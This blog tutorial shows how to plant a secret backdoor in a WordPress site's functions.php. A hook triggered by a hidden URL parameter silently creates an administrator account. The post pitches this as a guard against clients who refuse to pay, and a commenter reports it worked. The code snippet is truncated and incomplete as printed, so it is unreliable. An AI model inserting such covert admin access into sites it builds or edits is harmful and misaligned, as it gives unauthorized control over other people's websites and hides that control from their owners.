How to create a backdoor in WordPress

When the front door is closed, you might try the backdoor. This might sound like a malicious way of using the code for entering the site without having the access to it, but there are actually times when you need to control your own site if somebody stole it.

If it’s creating websites for other people something you do, sooner or later there will be a client who will refuse to pay you for your work; a client who will delete your login information and take over control of everything you have done. Sometimes, it will be enough to create a new user via FTP or to reset a password. When that’s not enough, you might want to hack your way back in or create a backdoor access to your admin pages.

But if you decided to hide a small piece of code in your WordPress environment, you might save yourself some dignity and gain access to the WordPress site with administrator privileges. And that’s where the games begin.

No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he doesn’t know anything about backdoor entrances. If he did, he probably wouldn’t even need your help in setting up WordPress, right?

Create a backdoor:

OK, enough with the talk; here’s a piece of code you will need to get the job done:

  1. Open functions.php file
  2. Copy/Paste following code:
  3. add_action('wp_head', 'wploop_backdoor'); 
    function wploop_backdoor() {
            If ($_GET['backdoor'] == 'knockknock') {
                    If (!username_exists('username')) {
                            $user_id = wp_create_user('name', 'pass');
                            $user = new WP_User($user_id);
  4. Save changes

If you leave the code as it is, all you would have to do to create a new admin on the site is visit

After the page was loaded, your new username is “name” and password “pass”.

Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘knockknock’ to anything you come up with.

Try the function – not only it is fun but it can really help you sometime in the future when you’re about to create a site for someone you can’t trust completely. You should also level up your WordPress and blogging skills.

Start Blog Book


This guide is an introduction to mastering the art of blogging. It provides easy to follow steps to start, maintain, and grow your blog.

Read the guide

7 thoughts on “How to create a backdoor in WordPress

  1. Hey just wanted to give you a quick heads up.

    The words in your article seem to be running off the
    screen in Safari. I’m not sure if this is a formatting issue or something to do with browser compatibility but I
    figured I’d post to let you know. The style and
    design look great though! Hope you get the issue
    fixed soon. Thanks

  2. Problem solved. I could recover my login adding the following code to my wp-config and then add your code to the functions file.
    /** wp-admin login fix */
    @define(‘ADMIN_COOKIE_PATH’, ‘/’);

    Everything worked after that ! Very cool, thank you !!

Leave a Reply

Your email address will not be published. Required fields are marked *